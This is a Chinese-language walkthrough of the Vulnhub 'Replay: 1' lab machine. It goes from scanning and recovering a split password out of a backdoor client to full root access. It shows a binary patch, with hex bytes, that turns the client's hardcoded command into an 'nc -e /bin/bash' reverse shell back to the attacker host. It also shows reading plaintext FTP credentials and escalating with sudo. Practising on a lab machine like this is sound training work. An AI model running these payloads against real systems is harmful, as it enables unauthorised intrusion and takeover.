Vulnhub之Replay靶机详细测试过程(获得Root Shell)
Replay
作者: jason huawen
靶机信息
名称:Replay: 1
地址:
https://www.vulnhub.com/entry/replay-1,278/
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:c9:15:8b 1 60 PCS Systemtechnik GmbH
192.168.56.102 08:00:27:a0:d5:27 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.102
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.102 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-15 21:30 EDT
Nmap scan report for bogon (192.168.56.102)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 54:35:aa:49:eb:90:09:a1:28:f3:0c:9a:fb:01:52:0d (RSA)
| 256 e7:0b:6e:52:00:51:74:11:b6:cd:c6:cf:25:3a:1b:84 (ECDSA)
|_ 256 3b:38:da:d7:16:23:64:68:8f:52:12:8a:14:07:6a:53 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/bob_bd.zip
|_http-server-header: Apache/2.4.25 (Debian)
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GetRequest, Kerberos, LPDString, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe:
| CH1:
| Auth Failed Closing Connection... =-
| DNSVersionBindReqTCP, HTTPOptions, SSLSessionReq, TLSSessionReq:
| CH1:
| Auth Failed Closing Connection... =-
| Auth Failed Closing Connection... =-
| GenericLines, NULL:
| CH1:
| Help, RPCCheck:
| Auth Failed Closing Connection... =-
| CH1:
|_ Auth Failed Closing Connection... =-
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.92%I=7%D=3/15%Time=6412713A%P=x86_64-pc-linux-gnu%r(NU
SF:LL,6,"\nCH1:\n")%r(GenericLines,6,"\nCH1:\n")%r(GetRequest,34,"\nCH1:\n
SF:\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n
SF:\n\n")%r(HTTPOptions,62,"\nCH1:\n\n\x20-=\x20Auth\x20Failed\x20Closing\
SF:x20Connection\.\.\.\x20=-\x20\n\n\n\n\n\n\x20-=\x20Auth\x20Failed\x20Cl
SF:osing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(RTSPRequest,34,"\nCH1:\n\
SF:n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\
SF:n\n")%r(RPCCheck,62,"\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connect
SF:ion\.\.\.\x20=-\x20\n\n\n\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closin
SF:g\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(DNSVersionBindReqTCP,62,"\nCH
SF:1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x
SF:20\n\n\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20
SF:=-\x20\n\n\n")%r(DNSStatusRequestTCP,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20
SF:Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(Help,62,"\n\n
SF:\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n
SF:\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20
SF:=-\x20\n\n\n")%r(SSLSessionReq,62,"\nCH1:\n\n\n\x20-=\x20Auth\x20Failed
SF:\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n\n\n\x20-=\x20Auth\x20Fa
SF:iled\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(TerminalServerC
SF:ookie,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection
SF:\.\.\.\x20=-\x20\n\n\n")%r(TLSSessionReq,62,"\nCH1:\n\n\x20-=\x20Auth\x
SF:20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n\n\n\n\x20-=\x20
SF:Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(Kerbe
SF:ros,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.
SF:\.\.\x20=-\x20\n\n\n")%r(SMBProgNeg,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20F
SF:ailed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(X11Probe,34,"\
SF:nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=
SF:-\x20\n\n\n")%r(FourOhFourRequest,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20Fai
SF:led\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(LPDString,34,"\n
SF:CH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-
SF:\x20\n\n\n");
MAC Address: 08:00:27:A0:D5:27 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.14 seconds
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ telnet 192.168.56.102 1337
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.
CH1:
hello
exit
^C
quit
zsh: terminated telnet 192.168.56.102 1337
1337端口不清楚运行什么服务
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ curl http://192.168.56.102
<!-- P1:qGQjwO4h6g -->
<style>
body{
background-color: coral;
}
@font-face{
font-family: "cool";
src: url('/files/cool.ttf')
}
body{
font-family: cool;
}
.color_txt{
color:purple;
}
.color_title{
color:pink
}
</style>
<body>
<span class="color_title">
<h1>
<img src="/media/welcome.gif"></img>
Bob's Website
</h1>
</span>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gif"></img>
<img src="/media/bob.png"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gi"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<br>
<span class="color_txt">
<p>
This is my website that I made by myself. I have several years of experience managing and creating IT systems. If you are interested in hiring
me you can find <a href="/files/CV.odt"> my CV here.</a> If after reading my CV you are still interested in hiring me then you can contact me
on my email: bob295018409@gmail.com
</p>
</span>
<img src="/files/myITTeam.png"> </img>
</body>
访问80端口,返回内容有一句注释: P1:qGQjwO4h6g,是密码吗?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ nikto -h http://192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.102
+ Target Hostname: 192.168.56.102
+ Target Port: 80
+ Start Time: 2023-03-15 21:38:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/bob_bd.zip' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: 430, size: 57c5a1a9d26e8, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-03-15 21:39:03 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 92K
drwxr-xr-x 2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r-- 1 kali kali 63K Mar 15 21:39 bob_bd.zip
-rw-r--r-- 1 kali kali 13K Mar 15 21:35 CV.odt
-rw-r--r-- 1 root root 4.0K Mar 15 21:33 nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ unzip bob_bd.zip
Archive: bob_bd.zip
inflating: changelog.txt
inflating: client.bin
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 256K
drwxr-xr-x 2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r-- 1 kali kali 63K Mar 15 21:39 bob_bd.zip
-rwxr-xr-x 1 kali kali 1.2K Dec 6 2018 changelog.txt
-rwxr-xr-x 1 kali kali 158K Dec 6 2018 client.bin
-rw-r--r-- 1 kali kali 13K Mar 15 21:35 CV.odt
-rw-r--r-- 1 root root 4.0K Mar 15 21:33 nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ cat changelog.txt
Changelog:
RG9uJ3QgZm9yZ2V0CgpQClMtPkItPkMtPkQtPlMKQy0+Qi0+UwpDLT5FLT5T
Next Update:
+ Add ASCII art
+ Fix bug where sometimes the backdoor fails to connect (fixed by reopening client.bin)
+ Add ablilty to be able to send more than hardcoded commands again (removed because of beefing up of security)
V4 [*clink* *clink* You will never be able to penetrate my defenses!]:
+ Backdoor will execute any command, too bad it only sends one hardcoded command :P (gonna have to add an input onto client)
+ Security beefed up bet no one can get through this, XOR and b64 is king
RW5kIG9mIGxvZw==
V3 [All wrapped up in a neat bow]:
+ Added a cool security challenge system to stop hackers
+ I am now compiling the python file into .bins
+ Added b64 system to improve security
Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==
V2 [The no go zone]:
+ Added b64 support
+ Added password check (validated by server)
RW5kIG9mIGxvZw==
V1 [And then there was light]:
+ I made a backdoor :D
+ Now I can access my server from anywhere without using ssh
RW5kIG9mIGxvZw==
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'RW5kIG9mIGxvZw==' | base64 -d
End of log
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==' | base64 -d
N.T.S Added 2nd half of password into the backdoor so if you forget that's where it is furture me. End of log
执行client.bin发现需要输入密码。
strings client.bin
home/c0rruptedb1t/MEGA/Projects And Operations/Project Replay/scripts/client.pydataIP: outputAF_INETEnter Password: sendmsgkeyencodexornotes00admincmd;echo Hello World, you are currently running as: ;whoamidecodestring--=======NOTES=======-- +Buy new milk (the current one is chunky) +2nd half of password is: h0TAIRNXuQcDu9Lqsyul +Find a new job +Call mom =====[END]=====commandlettersrecvoschoicesystem-= TERMINATING CONNNECTION =-
client_socketrandominputstrclearraw_inputCommand to be executed: replacejointimebase64
?exit1230012300admincmd;SOCK_STREAMconnectsleepoutdataappendXORtmpAttempting to connect...(
Definitely the password I swear -> password123 <- Definitely the password I sweartypesbye<module>encodestringnumsHello there you're not being naughty are you? bob_pass123456789rblensumiterlongnameopenreadreprsitelevelrangeformatlocalsxrange__all____cmp____doc__compileglobalsinspect__dict____exit____file____iter____main____name____path__exc_typefromlist__class____enter__bytearrayexc_value__import____module____delattr____getattr____package____setattr__classmethod__builtins__staticmethod__metaclass__exc_traceback/usr/bin/python2
GCC: (Debian 8.2.0-6) 8.2.0
从中可知,密码的第二部分为:h0TAIRNXuQcDu9Lqsyul
可能前面网页源代码中的字符串为密码的第一部分qGQjwO4h6g
因此完整的密码为qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul
运行client.bin
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ./client.bin
./client.bin: error while loading shared libraries: libpython2.7.so.1.0: cannot open shared object file: No such file or directory
执行错误,缺少库文件,可以安装相应的库文件来解决:
─(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo apt install libpython2.7
echo Hello World, you are currently running as: ;whoamidecodestring--
似乎client.bin有硬编码,该代码执行whoami,是否可以用vim修改client.bin,从而得到Shell
-
xxd client.bin client.bin.dump
-
用vim -b修改client.bin.dump,将echo Hello World, ....部分修改为echo Hello.... nc -e /bin/bash 192.168.56.146 5555, 注意要保持长度一致,修改十六进制数据即可(text部分无需修改),可以用cyberchef工具得到修改前的十六进制数据以及要修改的的十六进制数据。
-
xxd -r client.bin.dump >client.bin
echo Hello World, you are currently running as: ;whoami
对应的十六进制数据为:
65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 2c 20 79 6f 75 20 61 72 65 20 63 75 72 72 65 6e 74 6c 79 20 72 75 6e 6e 69 6e 67 20 61 73 3a 20 3b 77 68 6f 61 6d 69
修改为:
echo Hello Worldddd;nc -e /bin/bash 192.168.56.146 5555
对应的十六进制数据为:
65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 64 64 64 3b 6e 63 20 2d 65 20 2f 62 69 6e 2f 62 61 73 68 20 31 39 32 2e 31 36 38 2e 35 36 2e 31 34 36 20 35 35 35 35
注意需要逐个字节进行修改,要保证修改前后长度一致
执行client.bin(修改后),得到shell
──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.102] 58350
id
uid=1000(bob) gid=1000(bob) groups=1000(bob),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),115(lpadmin),119(scanner)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash: fortune: command not found
bash: cowsay: command not found
bash: lolcat: command not found
bob@replay:/root$ cd /home
cd /home
bob@replay:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Dec 6 2018 .
drwxr-xr-x 22 root root 4.0K Dec 6 2018 ..
drwxr-xr-x 19 bob bob 4.0K Dec 6 2018 bob
bob@replay:/home$ cd bob
cd bob
bob@replay:~$ ls -alh
ls -alh
bob@replay:~/Documents$ cd .ftp
cd .ftp
bob@replay:~/Documents/.ftp$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 bob bob 4.0K Dec 6 2018 .
drwxr-xr-x 4 bob bob 4.0K Dec 6 2018 ..
-rw-r--r-- 1 bob bob 49 Dec 6 2018 users.passwd
bob@replay:~/Documents/.ftp$ cat users.passwd
cat users.passwd
bob:b0bcat_1234567890:1100:1100::/ftp:/bin/false
bob@replay:~/Documents/.ftp$ sudo -l
sudo -l
[sudo] password for bob: b0bcat_1234567890
Matching Defaults entries for bob on replay:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on replay:
(ALL : ALL) ALL
bob@replay:~/Documents/.ftp$ sudo /bin/bash
sudo /bin/bash
root@replay:/home/bob/Documents/.ftp# cd /root
cd /root
root@replay:~# ls -alh
ls -alh
total 32K
drwx------ 3 root root 4.0K Dec 6 2018 .
drwxr-xr-x 22 root root 4.0K Dec 6 2018 ..
-rw------- 1 root root 5.1K Dec 6 2018 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 root root 4.0K Dec 6 2018 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Dec 6 2018 .selected_editor
root@replay:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@replay:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
